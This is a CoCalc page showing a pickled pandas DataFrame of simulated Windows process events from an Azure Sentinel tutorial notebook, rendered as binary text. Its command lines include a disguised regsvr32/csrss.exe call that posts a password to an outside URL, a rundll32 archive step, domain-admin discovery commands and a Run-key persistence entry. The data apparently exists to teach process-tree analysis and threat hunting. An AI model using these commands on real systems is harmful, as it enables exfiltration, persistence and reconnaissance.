CoCalc -- process

GitHub Repository: Azure/Azure-Sentinel-Notebooks
Path: blob/master/tutorials-and-examples/example-notebooks/data/process_tree.pkl
³²⁵⁵ views
��� �pandas.core.frame��	DataFrame���)��}�(�_data��pandas.core.internals.managers��BlockManager���)��(]�(�pandas.core.indexes.base��
_new_Index���h�Index���}�(�data��numpy.core.multiarray��_reconstruct����numpy��ndarray���K��Cb���R�(KK��h�dtype����O8�KK��R�(K�|�NNNJ����J����K?t�b�]�(�TenantId��Account��EventID��
TimeGenerated��Computer��SubjectUserSid��SubjectUserName��SubjectDomainName��SubjectLogonId��NewProcessId��NewProcessName��TokenElevationType��	ProcessId��CommandLine��ParentProcessName��
TargetLogonId��SourceComputerId��TimeCreatedUtc��NodeRole��Level��
ProcessId1��
NewProcessId1�et�b�name�Nu��R�h
�pandas.core.indexes.range��
RangeIndex���}�(h<N�start�K�stop�K�step�Ku��R�e]�(hhK��h��R�(KKK��h�M8�KK��R�(K�<�NNNJ����J����K}�(Cns�KKKt���t�b�B���
�8�@����8�@����8�@����8�@����8��p���8����8����8�@x��8��2w�8��_��8��jk&�8���b(�8�@�,*�8���'-�8���X.�8��c���8����
�8�@����8�@����8�@����8�@����8��p���8����8����8�@x��8��2w�8��_��8��jk&�8���b(�8�@�,*�8���'-�8���X.�8��c���8��t�bhhK��h��R�(KKK��h�i8�KK��R�(KhPNNNJ����J����Kt�b�BPPPPPPPPPPPPPPPPP�t�bhhK��h��R�(KKK��h!�]�(�$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��$52b1ab41-869e-4138-9e40-2a4457f09bf0��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��MSTICAlertsWin1\MSTICAdmin��WORKGROUP\MSTICAlertsWin1$��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��,S-1-5-21-996632719-2361334927-4038480536-500��S-1-5-18��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��
MSTICAdmin��MSTICAlertsWin1$��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��MSTICAlertsWin1��	WORKGROUP��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x78225e��0x3e7��0x1150��0x6dc��0x114c��0xfa4��0x1164��0x12b0��0xdd4��0xc34��0xc64��0x6e8��0xd98��0xfe4��0x2f0��0x18c��0x13a0��0x10dc��0x12f4�� C:\W!ndows\System32\regsvr32.exe��C:\Windows\System32\conhost.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe�� C:\W!ndows\System32\rundll32.exe�� C:\Windows\System32\tasklist.exe��C:\Windows\System32\net.exe��C:\Windows\System32\whoami.exe�� C:\Windows\System32\HOSTNAME.EXE��C:\Windows\System32\NETSTAT.EXE��C:\Windows\System32\net.exe��C:\Windows\System32\net.exe��C:\Windows\System32\net.exe��C:\W!ndows\System32\reg.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��%%1936��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x12f4��0x498��\.\regsvr32  /u /s c:\windows\fonts\csrss.exe "http://www.401k.com/upload?pass=34592389" post��7\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1��&cmd  /c echo Begin Security Demo tasks��Vcmd  /c echo Any questions about the commands executed here then please contact one of��Mcmd  /c echo [email protected]; [email protected]; [email protected]��?.\rundll32.exe  /C c:\windows\fonts\conhost.exe zip archive.mdb��tasklist��net  localgroup Administrators��whoami��hostname��netstat  -an��net  user Bob1 /domain��net  user BobX /domain��"net  group "Domain Admins" /domain��A.\reg.exe  add \hkcu\software\microsoft\some\key\Run /v abadvalue��$cmd  /c echo End Security Demo tasks��Ecmd.exe /c c:\Diagnostics\WinSimulateAlerts.cmd c:\W!ndows\System32 3��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\cmd.exe��C:\Windows\System32\svchost.exe��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x0��0x78225e��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��$263a788b-6526-4cdc-8ed9-d79402fe4aa0��source��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��sibling��parent���jwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwjwet�be]�(h
h}�(hhhK��h��R�(KK��h!�]�(h(h6et�bh<Nu��R�h
h}�(hhhK��h��R�(KK��h!�]�(h'h8et�bh<Nu��R�h
h}�(hhhK��h��R�(KK��h!�]�(h%h&h)h*h+h,h-h.h/h0h1h2h3h4h5h7h9h:et�bh<Nu��R�e}��0.14.1�}�(�axes�h
�blocks�]�(}�(�values�hK�mgr_locs��builtins��slice���KKK��R�u}�(j�hZj�j�KK$K��R�u}�(j�hdj�hhK��h��R�(KK��h^�C�	

�t�bueust�b�_typ��	dataframe��	_metadata�]�ub.
Product

Resources

Company
